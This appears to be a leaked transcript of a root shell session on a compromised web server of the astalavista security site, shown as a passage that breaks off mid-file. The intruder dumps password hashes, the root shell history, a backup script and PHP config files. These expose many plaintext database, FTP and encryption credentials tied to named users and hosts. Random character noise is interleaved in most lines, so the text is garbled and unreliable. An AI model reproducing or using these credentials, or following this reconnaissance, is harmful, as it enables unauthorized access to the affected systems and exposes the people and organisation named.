' g& r K, p8 Q1 {com1$jEZ62nri$aDTj.1REsrYePcPBdfOQz1:13780:0:99999:7:::) g Z# Y$ }4 R: @# D
astanet1$YniJLAr.$NKtPNNGK9mcmz3/mLMSWC1:14235:0:99999:7:::
: w- F$ }( c- {' v$ e* g* T0 `/ u E, ^
sh-3.2# cat /etc/motd
: C2 b! _' _8 o# N! B8 r; T( `#####################################################
6 h, i% o* [+ l#____ ____ ___ ____ _ ____ _ _ _ ____ ___ ____ # Y8 a9 z3 q: H! X
# |__| [__ | |__| | |__| | | | [__ | |__| #6 P3 _4 o/ l) r/ S' [4 }( f9 a6 \
# | | ___] | | | |___ | | \/ | ___] | | | #
3 H5 ^* o8 k3 U3 d, d0 y# # m0 G& F, P( Q9 l/ S: d: h
#####################################################% V" D; `5 a3 h3 E& |. a
# #! ^0 ]9 H6 H* }
# Admin Contact - 链接标记support@secureservertech.com #
# b/ `$ U: Z( y$ o# #" n/ Y2 `9 ^2 Z/ G& z& v% R
# Available ShortCuts #. u1 G5 W8 a _9 l* J5 M" r5 h, Z
# #& ~# T/ r0 _- ]2 b$ V
# nst - list active connections #
' ] E; R9 h/ G" `& `# ddos - shows how many times each ip is connected #2 C2 u6 A, \4 D# |! x. q" X
# ltr - restart the webserver #
$ s) P; {- X/ s1 r8 G3 L# phpc - edit the php config file #. U6 P. I8 t* r( L( i
# htc - edit the webserver configuration file #
2 J, P; ], |* a2 t$ D- x# up - uptime #
- g; r. N3 A' L( e" I# etd - edit the motd of the day file #' s9 Y. u+ `+ w+ [+ J
# htr - start and restart apache if needed #
A; O/ r, u' i+ k# syng - shows active SYN_RECV connections #; e% x0 [2 T/ F5 n- m# Z {
# synd - syn flood blocker - “synd -h” for usage #
+ D: V7 \- c7 ~6 ?#####################################################" ~/ H f" v( o k5 t3 z6 N
# NOTES: #+ I/ _0 Y" E1 K9 b3 T5 a( p8 e" w
# Last Upgrade - 12-08-2008 by JF #% ]7 H/ b0 N! J# U. p) x' R) o
# My.cnf/Mysql Optimization - 1-28-09 #
. o) K( t) R% k4 @' Y# #
2 l/ |) `/ u5 c% V# #
1 l# }7 V; q/ `3 J- U/ ]8 d) Z7 k# #
- @, `6 [' t9 K) }4 j8 B#####################################################: d0 K+ h8 A5 p# ?7 W! O. E
1 p3 h6 y) n6 i, [
sh-3.2# lastlog | grep -v Never1 R- E w' s' ^( x* g
Username Port From Latest
% |: T$ a5 k) T: o! t2 u8 a1 Groot pts/1 adsl-194-162-fix Thu Jun 4 07:19:14 +0000 2009
6 ]) I0 _& U8 L% dadmin pts/1 cp.secureservert Thu Mar 20 10:25:39 +0000 2008
# Z$ H: M9 y" @, C3 f& Y+ fcom pts/0 cust.static.212- Tue Jun 2 07:46:30 +0000 20094 ?7 Y, B5 E; u% e6 G- }
astanet pts/0 adsl-194-162-fix Thu Apr 16 08:20:44 +0000 2009% m4 p3 s0 a6 e+ {. q) x( P5 T
: ~: |2 r4 C+ d4 j ]% P3 `
sh-3.2# ls -la9 n4 s1 Q: I1 |8 y& ]
total 453376
3 u0 e* Q+ M. G% v! [0 m5 Q3 Xdrwxr-x— 15 root root 4096 Jun 4 08:40 .
/ I, v& f* O* {5 z8 G3 xdrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
* l- j) M' ?# ^. B% b0 [9 x-rw-r–r– 1 root root 2394400 Oct 19 2007 10mbtest.zip
# R! |" j/ J7 A2 i6 F) `-rw——- 1 root root 1006 Sep 11 2007 anaconda-ks.cfg1 N/ i% M, `: j6 B2 e& @% U' N
-rw——- 1 root root 16836 Jun 4 07:21 .bash_history
1 C/ ?. W! e& P+ J( B-rw-r–r– 1 root root 24 Jan 6 2007 .bash_logout
4 ~7 K' s! r/ ]( b) ^$ l-rw-r–r– 1 root root 191 Jan 6 2007 .bash_profile
* [- S/ g5 q. @$ g$ ?) F2 ^-rw-r–r– 1 root root 176 Jan 6 2007 .bashrc. z% z4 {* [% f3 h- Y2 w( g0 M
-rwx—— 1 root root 1899 Oct 28 2007 bk.sh
1 ^" e1 m0 P! }+ s-rw-r–r– 1 root root 1327 Nov 29 2007 cert+ P- B8 G+ a' i; \8 V4 H! N
-rw-r–r– 1 root root 139860821 May 14 2008 contrexxbackup_20080514.sql
! F- }9 S1 j9 s r/ ~- P( Rdrwxr-xr-x 4 root root 4096 May 20 2008 .cpan
( t5 f! T0 G! o& q; I/ g) H-rw-r–r– 1 root root 100 Jan 6 2007 .cshrc, Z3 i) q* g8 Y8 N! E
-rw-r–r– 1 root root 323079 Mar 31 13:48 defaultp_ports.sql+ x1 q3 x, E2 i( X4 [4 m
drwx—— 2 root root 4096 Oct 28 2007 .elinks
' h, l5 g% x0 A$ M/ P! ^- z0 |drwxr-xr-x 13 root root 4096 Mar 21 2008 gdb-6.7.1
?. K h( m: S8 Z+ d4 L8 B-rw-r–r– 1 root root 15080950 Oct 29 2007 gdb-6.7.1.tar.bz22 Y7 L U' H; F* S# C( v9 G
-rw——- 1 root root 0 Apr 16 13:19 .history
' Y$ J' q8 T0 W3 g9 c-rw-r–r– 1 root root 16095 Sep 11 2007 install.log
, A8 Z- i0 S! `4 l-rw-r–r– 1 root root 2566 Sep 11 2007 install.log.syslog+ E/ C; a( U: e0 u! ?
-rw-r–r– 1 root root 1003 Jul 22 2007 install.sh9 E: y6 T% c* c7 A9 i
-rw——- 1 root root 35 Jun 2 14:23 .lesshst
8 C# {, D9 I2 v0 u( O8 n8 ^9 e& ndrwxr-xr-x 2 root root 4096 Dec 29 2007 .lftp
: M+ G) v+ C) F3 K/ Y3 i/ adrwxr-xr-x 10 root root 4096 Sep 14 2007 linux-2.6.19.2-grsec/ [$ g3 G1 z0 e2 I |4 M
-rw-r–r– 1 root root 94979336 Feb 16 2007 linux-2.6.19.2-grsec.tar.gz% A. J g& y, N. g9 P8 \! v
-rw-r–r– 1 root root 4737058 Sep 22 2007 linux-2.6.22.tar.bz2: w$ J+ i8 S. @0 G0 r- T
-rwx—— 1 root root 760 Sep 18 2008 lp
- e1 l- h% n0 ]$ Ndrwxr-xr-x 12 root root 4096 Nov 30 2007 lsws-3.3.1
0 C7 J7 x5 l, I3 P' n-rw-r–r– 1 root root 2480045 Nov 30 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz- g" g& W. E$ }3 V# |
-rw-r–r– 1 root root 6388501 Nov 29 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz.19 J' v, q! H6 F) d
drwxr-xr-x 12 root root 4096 Mar 21 2008 lsws-3.3.9
0 {/ a; r. p" k/ n+ @0 f) n-rw-r–r– 1 root root 6437577 Mar 21 2008 lsws-3.3.9-ent-x86_64-linux.tar.gz/ @5 v' e0 }1 s# X3 d
drwxr-xr-x 12 root root 4096 May 29 15:10 lsws-4.0.3
( N2 `2 M1 s9 Q-rw-r–r– 1 root root 6496050 May 8 05:59 lsws-4.0.3-ent-x86_64-linux.tar.gz
% @# L) l9 o: e, F7 P-rw-r–r– 1 root root 25316 Feb 15 2006 mybk.sh7 i* }! j6 h# q; H
-rw——- 1 root root 41 Oct 19 2007 .my.cnf
' l4 t& N6 A5 M/ Q# H0 c" G-rw——- 1 root root 2902 Jun 4 08:40 .mysql_history, l- m4 P# b; q# ^* p; G# F
-rwx—— 1 root root 38873 Apr 16 2008 mysqlreport/ Y8 i. m0 j) [9 ]; s1 u$ c' i$ ~
-rw——- 1 root root 41 May 20 2008 .mytop
6 X# Q6 `& w/ sdrwxr-xr-x 3 1000 1000 4096 May 20 2008 mytop-1.6
0 U0 J: }3 ~/ x-rw-r–r– 1 root root 19720 Feb 17 2007 mytop-1.6.tar.gz
# b c0 @: t& N. Y0 O: J( f( p4 V% Fdrwxr-xr-x 2 root root 4096 Oct 28 2007 .ncftp
" W$ \+ d/ _5 `; T; v-rw——- 1 root root 1462 Sep 21 2007 opt.php; H) `$ ?1 k6 G) n
-rw-r–r– 1 root root 3371 Sep 22 2007 p
D# c% R& ^+ |5 n. }( H( {-rw-r–r– 1 root root 7608429 Aug 30 2007 php-5.2.4.tar.bz2% L W0 C. u' l; J4 f
-rw——- 1 root root 1024 Feb 3 21:32 .rnd
, I. L: f; P% G# `+ q& `-rw-r–r– 1 root root 716 Nov 28 2007 server.csr
4 x' u) m. [5 }( N& k! d& y-rw-r–r– 1 root root 887 Nov 28 2007 server.key% Y7 D: s+ E" a& X
drwx—— 2 root root 4096 Oct 10 2008 .ssh
5 ~! q9 _8 O/ Z9 f-rw-r–r– 1 root root 44227 Oct 28 2007 tar-inc-backup.dat d- ]; S& \( B' C
-rw-r–r– 1 root root 129 Jan 6 2007 .tcshrc0 d% U' s1 C" x9 B! |7 Y, `9 M
-rw-r–r– 1 root root 104874307 Oct 17 2007 test100.zip
W% t8 E) y$ G2 g+ p( M: S7 ]-rw-r–r– 1 root root 67085540 Oct 19 2007 test100.zip.1
: m( S+ T; ]2 p* zdrwxr-xr-x 2 root root 4096 Apr 29 11:15 tmp
P+ j5 C) i& \ W! J% s-rw-r–r– 1 root root 42596 May 21 2007 tuning-primer.sh
# `! V6 o2 u! c' M0 Cdrwxrwxrwx 19 1000 users 4096 Mar 21 2008 valgrind-3.3.0# t" s% h, [7 R9 W {" F+ p. F
-rw-r–r– 1 root root 4519551 Dec 11 2007 valgrind-3.3.0.tar.bz28 J; w: [) K: P5 F" G& z
-rw——- 1 root root 12997 May 16 2008 .viminfo) f$ Y# n( b2 R, N! L( {
" y. @& v* v" \: Fsh-3.2# cat .bash_history
) q1 x4 j% P3 m5 H3 i. N3 W[snip]5 \! l0 O9 \# ~. }/ M
wget cp4sst.com/sstlinux.tar.gz4 S" {- \: x* V+ v4 `
tar zxvf sstlinux.tar.gz% `" E7 ~/ m p7 B
cd linux-2.6.27.10$ }& o) F+ P$ p# N
sh install.sh# P0 G2 S" ^- w- H+ I2 u# A6 d3 o+ c
make bzImage ; make modules ; make modules_install ; make install6 F. n+ Y1 E$ g- G* h+ r
make clean' B6 Q- X9 w, [! r% n" A
service mysqld restart
8 X$ i6 w9 _% Y# U[snip]
; x& s. z# M# w$ E* U# {. r' zcd /usr/sbin/: w( `- P" u& B# U0 n& b
chmod 4777 traceroute* W0 J' D9 y" ?9 e# L; I+ s+ }/ v
chmod 4777 ping
! h: X+ L( Y1 m+ r/ m& Ptraceroute -I 链接标记[url]www.astalavista.ch[/url]8 ^1 `6 a% _- m7 t0 h
[snip]
5 y9 t% i! C8 l6 a6 Avi /etc/csf/csf.conf8 \. }4 E4 e& y' F
traceroute google.ch" |1 l9 B# F0 S3 P% I
service csf restart) V% H8 O; z4 @6 Q2 H& j( A
tracert google.ch" ~8 Q) U* N/ l* s% c
service csf restart
5 @3 q6 E! z- k U Q4 gtraceroute 链接标记[url]www.google.ch[/url]8 N+ D$ T" X* F* ?% S
tracert 链接标记[url]www.google.ch[/url]0 I* c8 t- s: v E* Y- c7 q
traceroute 链接标记[url]www.google.ch[/url]" \3 S) {+ q$ `6 g0 I
locate traceroute) j( ^/ w8 z9 \! y: M
chown 4755 /bin/traceroute1 U& Y; }( y/ _4 p
chown 4777 /bin/traceroute4 Q8 `6 C$ Q1 N# f# _5 T( g+ Z
locate ping5 b/ U5 M1 y X& a& ~
chown 4755 /bin/ping
; _/ _: s0 `6 }% s. Gchown 4777 /bin/ping9 i, O& U/ c' i Y$ k. A' R8 Y9 g
cd /bin/# ^" B! {, h, F& b& I W* p
ls -ali | grep ping: r. R$ Z+ X, p- u
chown root ping
/ R. F7 \2 k% @$ n5 S O5 E' Ychmod 4755 ping' S6 t( n) H6 o8 H1 O5 p; s
ls -ali | grep traceroute
7 s/ w& L2 g- V, c; Z9 H1 B4 F6 B1 U1 Echown root traceroute
7 u7 t$ X2 z' F V; w! A2 Z7 d$ |5 c+ fchmod 4755 traceroute
& M. c' ^- E4 M7 r# Pls -ali | grep traceroute
- j+ [' X$ E' \traceroute -I 链接标记[url]www.google.ch[/url]
, b E; x& N5 R: C" ? x( e3 `" ` ?traceroute 链接标记[url]www.google.ch[/url]3 h6 w1 G8 {. W3 Z0 i$ ?3 ?
whois pmsantos.ch/ ]5 d H$ w. z+ H+ R8 O6 I
[snip]6 C8 X& f6 O( _7 O( P
mysql -h com_contrexx2_live < /root/defaultp_ports.sql' x; E. V- U" {6 E' G- \5 w
mysql -h -ucontrexxuser2 -p0fEYNZgXz1pKe com_contrexx2_live < /root/defaultp_ports.sql* P4 P4 E% J1 q# B( a3 Y" E0 W" s# R. L( V
mysql -h -u contrexxuser2 -p com_contrexx2_live < /root/defaultp_ports.sql
+ ~3 s# i; q3 c1 Xmysql -h localhost com_contrexx2_live < /root/defaultp_ports.sql# {0 X5 w0 P6 U" x
top! [1 u- z' w: j$ Q4 a+ z( N# |
ping ssth.ch
" H% f( o( o$ Z+ S% dping asdlkfaljgasd???ljg???lasj.ch! U$ V6 W/ \- _( i* t9 U6 [
ping asdlkfaljgasdlasj.ch
* U" b- l/ O# ]5 d& Rping 链接标记[url]www.ssth.ch[/url]* C0 K7 N, n c
ping ssth.ch: H0 j6 t" A! E
nslookup 链接标记[url]www.google.ch[/url]
! a% _0 L' M' _ z. V3 o# Y7 |nslookup 链接标记[url]www.ssth.ch[/url]
# u2 V9 {8 B' n2 R- z% ~3 ~man nslookup
U/ M. c. ]% }& k! ~3 Nping 链接标记[url]www.google.ch[/url]( j6 q+ Q9 H/ ~
nslookup 链接标记[url]www.google.ch[/url]
0 H# d+ Y- q7 [nslookup 链接标记[url]www.google.ch[/url]
]# ~+ b: w' E/ u2 ~nslookup salfjasdlf.ch
6 ~6 x/ a! C# ?: b[snip]6 `$ Z+ a* m4 w
openssl passwd -1 sadf
0 ~1 y- l( \! O0 g/ C7 P' X$ Q$ A0 k8 Iopenssl passwd -1 5cZNHstdTy
/ A, l p, n) l- wmysql9 ^) r) |( O' o) u1 h& g, C% y
mysql
( l" K1 M7 h* F/ i) Q! b6 Q. ^locate proftp
- {4 w+ i' W& ]2 W, G4 cvi /etc/proftpd.passwd$ o8 e$ g# s0 k; d3 N7 d/ D/ h9 `0 _ K
service proftpd restart% c" w y+ r3 \# r2 s; E: p0 o
locate proftpd.conf; T9 K7 w O/ e2 g
vi /etc/proftpd.conf
: F3 {4 W" e6 N1 x& I. X. Hvi /etc/proftpd.passwd x7 S0 |( @, f: W5 Y3 z
service proftpd restart
/ ?+ C; G, n( e! W0 n( S[snip]
7 e9 c8 H. l* y/ ]/bin/sh /home/com/backup_system/backup.sh( q8 `" T5 _$ z; b1 a. a" [
tar cfv /home/com/backups/09-04-28_backup.tar /home/com/public_html/admin: `5 t# x0 |& u0 J2 s4 F
mysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2_live > 09-04-29-com_contrexx2_live-full.sql& v; c* ?/ w5 Q0 t
mysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2 > 09-04-29-com_contrexx2-full.sql
7 ?8 q2 {! e$ X' }) Qls -ali
5 a/ }) Q" \1 ?) Omysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS com_contrexx > 07-04-29-com_contrexx-full.sql
5 n$ k$ D/ U7 J/ mmysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS ideapool > 07-04-29-ideapool-full.sql
# c2 d3 v) \* R5 W w& A( `crontab -l
2 S R& a" C# v {crontab -l- T, R# g4 ~6 T9 r% S
php -q /home/com/public_html/modifications/cronjobs/securitynews.php5 {! }% O8 o2 ~4 W8 e0 [0 Z
/home/com/public_html/modifications/cronjobs/exploits.sh
' Q" d m0 _, w) j6 L+ wwget 链接标记[url]http://www.litespeedtech.com/pac ... x86_64-linux.tar.gz[/url]: j2 G6 C0 L6 U: D1 a% U' ]
tar zxvf lsws-4.0.3-ent-x86_64-linux.tar.gz
) s) ^/ o7 B; ?cd lsws-4.0.3
9 F. w! Q+ P7 |( B/ k) tsh install.sh
$ R: ~9 D: x% A3 v5 W' G9 P+ t/ cuptime
! w9 _7 `8 X1 S* u' u5 s2 l* `0 ?hdparm -tt /dev/sda
1 s# ]8 `/ I1 ^& {9 `iostat
! I N! J' |0 i. s; ^) P* Oyum install iostat2 f: a; c8 y1 V+ _
iostat# D2 T4 x" a4 ]: _& u
whereis iostat
( n* z9 o. ~6 m0 y- X$ S1 {! Uyjm clean all
' H3 e7 ?+ c0 i5 o8 d/ _yum clean all ; yum -y update
6 y5 j" C/ C( T( z/ Xiostat
- `/ I" E! ~7 ^* qyum install systat6 R1 [# i Z& B
rpm -qa | grep iostat1 Q* [! ?1 a4 R# h7 C
rpm -qa | grep sysstat
0 M. W3 ^3 _7 s X; T2 `rpm -qa | grep systat
& n7 u+ |1 X e+ H8 zdmesg -c
. Q, H( M8 X5 Psysctl -p
; q9 _8 ^; |5 ?8 ~6 A" euname -r0 `' o+ \+ Q _3 U) g
cd /usr/src
9 Z( \% X* |' Mwget nix101.com/kernels/sstlinux.tar.gz8 O: T1 e r! _( R
shutdown -r now
# z6 g/ r V2 d+ N5 G& m. \3 s7 V" Ynano -w /boot/grub/grub.conf. Q. ?9 `+ [$ I
( v" d3 z5 k9 @, b, m/ Nsh-3.2# cat .my.cnf1 u: r! ~5 N( K7 ] C
[client]
( R* X5 d7 t$ f( Q* p+ k5 Yuser=da_admin( a: m6 u9 u' Z
password=X9dctmRH. O# ?: Y0 j6 `; t/ C0 `
7 ? d$ s' ]7 z0 B1 P, i. ^sh-3.2# cat /home/com/backup_system/backup.sh
8 w1 A: |6 f R0 Y7 L#!/bin/sh: ^. S) C( c& G7 \8 E8 D
#####################################################################2 T) H# p: r0 Y0 Y4 M; ]( B
# #
O& |& t. d D2 K) M# incremental backup for astalavista.com #- I% f. t4 B# w0 i8 n$ Q
# #
( I! b( i6 B# T' `6 |' f4 B; N/ J# author: Paulo M. Santos <链接标记paulo.santos@astalavista.com> # F3 R0 u$ }3 g+ O
# #$ a) Y1 H& l% U) g
#####################################################################! ^* l9 S# s- ]" Y7 @. |
[snip]
1 D6 a+ V" a" {- A/ X( VPROG_DIR=”/home/com/backup_system”;
% M/ u# D: T1 j2 f }8 R7 @( z. vBACKUP_DIR=”/home/com/backups”;- z! p4 b# B4 w: s- t8 Y
DOBACKUP_FROM=”/home/com/domains/astalavista.com/public_html”;2 Y, L: P1 R% P) y1 G) k* `
# ftp for synology backup server. Z3 I& i$ J7 a9 A+ ~" K4 ]/ M
FTP_HOST=”212.254.194.163″;' L( Q, X) z; `! w; c
FTP_PORT=”21″;
2 { i ?0 m7 d4 P$ F/ |7 {" A4 TFTP_USER=”astalavista.com”;) V J7 v. D/ V7 I$ D; q9 o
FTP_PASS=”yWHOJbzpWTWC6Xrmg1WnfBk5V”;1 C; B% p3 a3 B
FTP_DIR=”/astalavista.com”;
" I5 a3 A$ Q& B0 F# database8 i2 ~/ X+ A+ B
DB_HOST=”localhost”;
; m% }: s/ R- Q: @DB_USER=”contrexxuser2″;( ~, K* z. T" P# {" E' O
DB_PASS=”0fEYNZgXz1pKe”;8 \# @+ N, L( O
DB_DATABASE1=”com_contrexx2_live”;
; u# q @' w1 d s- [$ r: ^DB_DATABASE2=”com_contrexx2″;
; E( O7 p) L1 _: J- A[snip], F! U0 m' Z$ R0 a) V2 }7 P
ftp -in $FTP_HOST $FTP_PORT <<EOF% ^' l% S B2 @" \3 N
quote USER $FTP_USER+ p* M' U( }- V8 R" l- c9 \' l
quote PASS $FTP_PASS" P' m. i* z9 l) I
cd $FTP_DIR
, X- g. g* y8 L0 kput $DB_FULLNAME-SQL_Dump.tar% ~$ |: i' r5 Q8 l2 c( G$ u7 d
put $BACKUP_FULLNAME-Public_HTML.tar
* o2 b! ?5 d9 V' D% M% @9 _close: d7 x3 V3 ^" U2 Q' A
bye7 n6 h* X3 e6 i: V, e- ^# S
EOF
& r2 R# Y) t4 q4 v/ P: |; g' k1 {4 R6 _9 d+ F$ p$ w" h) R2 f
sh-3.2# cd /home; I# ]" D2 v) q |* O6 q
sh-3.2# ls -la
# z6 K5 n g- O4 dtotal 120' P7 a* [8 H+ Y4 q
drwxr-xr-x 14 root root 4096 Mar 11 17:56 .
. L( F9 Q6 A: W: Y2 }. l2 kdrwxr-xr-x 25 root root 4096 Jun 3 02:43 ..- p J, s( y1 [1 ~
drwx–x–x 9 admin admin 4096 Nov 28 2007 admin6 @; F$ C0 N! K7 V4 T; i' A/ _
-rw——- 1 root root 8192 Jun 4 03:03 aquota.group( u" T. t+ [4 A8 a
-rw——- 1 root root 8192 Jun 3 02:45 aquota.user
/ m5 A6 R: P1 w! P3 Fdrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet
, ~: I& s' E u0 }/ ?/ Rdrwxr-xr-x 2 root root 4096 Jul 29 2008 backup9 }( x8 z' |0 a4 f# ~2 w- S1 I
drwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161
0 O& m) u4 G5 j" x8 r: b# Zdrwx–x–x 10 com com 4096 Apr 28 12:40 com
8 }8 m. u* E4 kdrwxr-xr-x 2 root root 4096 May 17 2007 ftp7 [0 g2 f: I2 O& F; V% O
drwx—— 3 jon jon 4096 Sep 21 2007 jon8 T1 V+ y9 s; g
drwx—— 2 root root 16384 Sep 11 2007 lost+found K% |: p6 C! p5 ]+ e6 Y
drwxr-xr-x 2 root root 4096 Sep 14 2007 my
! C! b7 d. W$ m8 y1 e Udrwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata
: v& @5 N6 [' s9 o. o6 ^5 y& @' udrwx—— 2 jon jon 4096 Sep 15 2007 test
3 w: i7 F5 q, Fdrwxrwxrwt 2 root root 4096 Jul 29 2008 tmp/ f% `2 _+ J9 D7 e( P
1 \9 ]4 `$ |, {, t7 gsh-3.2# cd admin6 o( [. D& {0 l. L+ R" v
sh-3.2# ls -la4 G) O6 v' i1 t9 b! o4 P
total 1735896$ p0 T' o8 i4 c3 J+ K# A Y
drwx–x–x 9 admin admin 4096 Nov 28 2007 .
1 @9 R+ L* p9 c2 R; z% ]3 Wdrwxr-xr-x 14 root root 4096 Mar 11 17:56 .. S, j( z0 E1 K. j' Y# }0 _1 @
drwxrwxr-x 2 admin admin 4096 Oct 25 2007 admin_backups9 G o" S+ b6 U5 U2 w3 X' j! w) w
drwx—— 2 admin admin 4096 Sep 28 2007 backups4 v( P7 F, {, k6 v8 z. c+ H ~- o; j
-rw——- 1 admin admin 860 Sep 17 2008 .bash_history- F8 y$ Y+ n. F Z8 O! ~& C
-rw-r–r– 1 admin admin 24 Sep 14 2007 .bash_logout
$ J8 v& K( X* d8 y) E2 ?; F" _& f-rw-r–r– 1 admin admin 176 Sep 14 2007 .bash_profile0 x) C6 O2 |/ w+ C, E3 _
-rw-r–r– 1 admin admin 124 Sep 14 2007 .bashrc% j9 Z9 ^0 w. ? Z2 T
drwxr-xr-x 2 root root 4096 Sep 28 2007 com_backups1 K E/ _% V7 p3 g. u
drwx–x–x 6 admin admin 4096 Sep 21 2007 domains
1 d: F( \( l; O6 A6 w4 Mdrwxrwx— 3 admin mail 4096 Sep 21 2007 imap/ H6 Z, [2 P7 x4 E
-rw-r–r– 1 root root 24 Sep 21 2007 info.php4 x" {: @8 w: \# s) z% k6 Y
drwx—— 2 admin admin 4096 Sep 21 2007 mail
8 k1 v% ?4 \, U& b9 ~$ R8 e-rw-r–r– 1 root root 716 Nov 28 2007 server.csr
& p, A, a( z, \6 L* J1 @+ n-rw-r–r– 1 root root 887 Nov 28 2007 server.key
9 ]. F, J3 h( Z$ r4 ?! S-rw-r—– 1 admin mail 34 Sep 14 2007 .shadow/ x+ [0 J* C; K1 ^+ Y, z
-rw-r—– 1 admin com 1775711054 Oct 25 2007 user.admin.com.tar.gz
5 B5 `/ A. P# gdrwx–x–x 2 admin admin 4096 Jul 29 2008 user_backups
3 J: O7 @/ l9 O( x4 G8 H! c! ?0 Q( o: ?2 Z
sh-3.2# ..
+ u& e) f' R; A7 j4 Esh-3.2# cd jon
8 [8 s: a( ?8 k* Rsh-3.2# ls -la
! W/ B v4 C3 H2 e' r1 p! htotal 36! K. j1 ^: S. k N7 a
drwx—— 3 jon jon 4096 Sep 21 2007 .! Q0 O$ Z+ D! U' j% c B3 k
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..3 O) }" u% L z" U v
-rw——- 1 jon jon 53 Sep 21 2007 .bash_history
, r% P2 }3 U8 ^! m+ E-rw-r–r– 1 jon jon 24 Sep 21 2007 .bash_logout
! H( ]- }1 w* F1 ^-rw-r–r– 1 jon jon 176 Sep 21 2007 .bash_profile
8 P' u; G6 i b$ n-rw-r–r– 1 jon jon 124 Sep 21 2007 .bashrc
' }1 C O- U( o. l$ p7 \2 S* g-rw-r–r– 1 root root 24 Sep 21 2007 info.php
8 E5 P1 |1 D" z" t- Pdrwxrwxr-x 2 jon jon 4096 Sep 21 2007 public_html
6 t4 [/ j3 d @7 q- t( `, K- P y1 s8 R& [6 ^. m
sh-3.2# cd ..# F: _4 }, R2 ^5 O1 X9 v& d! q, N
sh-3.2# cd test
5 e) W" ?7 f3 l$ M Qsh-3.2# ls -la
, W7 H( R: U. i2 v utotal 482 _$ e* q; j& y" K5 P
drwx—— 2 jon jon 4096 Sep 15 2007 .: |6 h) n! R$ i' {5 I2 u. H
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..: p1 L7 N4 q- h
-rw——- 1 jon jon 79 Sep 21 2007 .bash_history4 ^" ], |! ]; W) s- h8 d
-rw-r–r– 1 jon jon 24 Sep 15 2007 .bash_logout
; g: L3 }. S( V/ w) [ `9 w( `/ n8 q4 z-rw-r–r– 1 jon jon 176 Sep 15 2007 .bash_profile4 ?/ D: _' f; J3 Z$ c
-rw-r–r– 1 jon jon 124 Sep 15 2007 .bashrc
5 ?5 p/ K, q# b2 n! U+ Tsh-3.2# cat .bash_history
% Y7 G$ k+ M! G* Z4 ]( [9 R5 N/usr/bin/mysqladmin -u root password PoliuJhytg67& j3 u% Q2 q, j5 |7 p7 {
4 z1 Q2 @9 h7 i- ^5 r& P. e$ b$ P) [sh-3.2# cd ..5 {) F `1 q3 J; K/ h( q% [9 R
sh-3.2# cd astanet( e! c) V# E0 ]: m# n$ J
sh-3.2# ls -la
6 e& k: ~( W, o$ \2 Qtotal 52
/ Q# h' d- m8 ?8 S, {' {drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 .# L! x3 d' J, |9 m$ |, K! }
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
$ P% u& g4 r/ Y+ Y* @drwxr-xr-x 2 root root 4096 Dec 23 16:00 auth( i3 Q. L2 Y3 `
-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history& w' D' K8 B# f- z+ d
-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout; b( T$ D6 ~: a( p: Z
-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile" S4 u8 M) |. E" P* c
-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc
# G6 `0 z. d. K' P: h$ H# a3 ]drwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains1 U. l+ a. L3 V' B
drwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap
q H8 t) n+ v7 D% K0 x6 k2 n8 Ddrwx—— 2 astanet astanet 4096 Dec 23 12:18 mail% r/ b- _6 P4 Y' V3 y- M
-rw——- 1 astanet astanet 197 Jun 4 09:51 .mysql_history
2 {! J3 O4 ?3 M* z. `lrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html" Y( V5 {, g; M: R- X4 n
-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow, H5 i7 f2 M9 g& M
0 T' ]3 g5 e) a5 Osh-3.2# cd auth/
, y# l% V6 {* _; j0 Z7 ish-3.2# ls -la
3 m C6 A7 l# O+ h% F! Y6 |total 28' m& k; M" K2 f: [! f2 m7 g! o
drwxr-xr-x 2 root root 4096 Dec 23 16:00 .6 c9 Z* b0 j; n) j$ i9 w
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 ..8 q" b- V7 h, ^$ i# a k
-rw-r–r– 1 root root 321 Jan 5 2006 hackercontest.config.inc.php
* |! ~- V, \$ H, ^4 q-rw-r–r– 1 root root 319 Jan 5 2006 hosting.config.inc.php
: X) @6 g+ G1 T- m" R1 U/ r% t-rw-r–r– 1 root root 24 Jun 4 09:38 .htadm_pwd( D7 e# Z1 }0 \( [
-rw-r–r– 1 root root 49 Jan 5 2006 .htpasswd_newhosting0 R; T B4 Q1 d
-rw-r–r– 1 root root 51 Oct 11 2006 .htwebalizer_pwd3 O5 ?4 p( {/ V A
/ D3 s" ?8 f9 Jsh-3.2# cat hackercontest.config.inc.php
+ a. q9 G/ A7 B% R5 Q1 [; q& T<?PHP) Y; }3 m2 H/ W3 `* l: u; p
// Variabeln f?r Verbindung zur Datenbank //
. f/ h$ E: T8 Q* e7 Z x$conxHost = ‘localhost’; // MySQL hostname% }! I7 E6 e4 U) l/ D
$conxUser = ‘hackercontest’; // MySQL user) f8 Y( _* K- U* z5 |
$conxPassword = ‘K6m@7dUc’; // MySQL password
- x: G8 n5 C" m2 N$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish
- X8 z( E3 C" A& z?>
{0 C$ L" `, W, K$ Z- h6 P( osh-3.2# cat hosting.config.inc.php
: q' {) h* V' @<?PHP2 |7 ]0 G w( j8 X5 k% M
// Variabeln f?r Verbindung zur Datenbank //9 C8 z$ Q2 \' c3 q- K) e0 Z( p
$conxHost = ‘localhost’; // MySQL hostname
& N, v. @* m* r( D8 W. n7 J$conxUser = ‘hostinguser’; // MySQL user! v+ \1 F$ Z2 m8 L1 s2 x
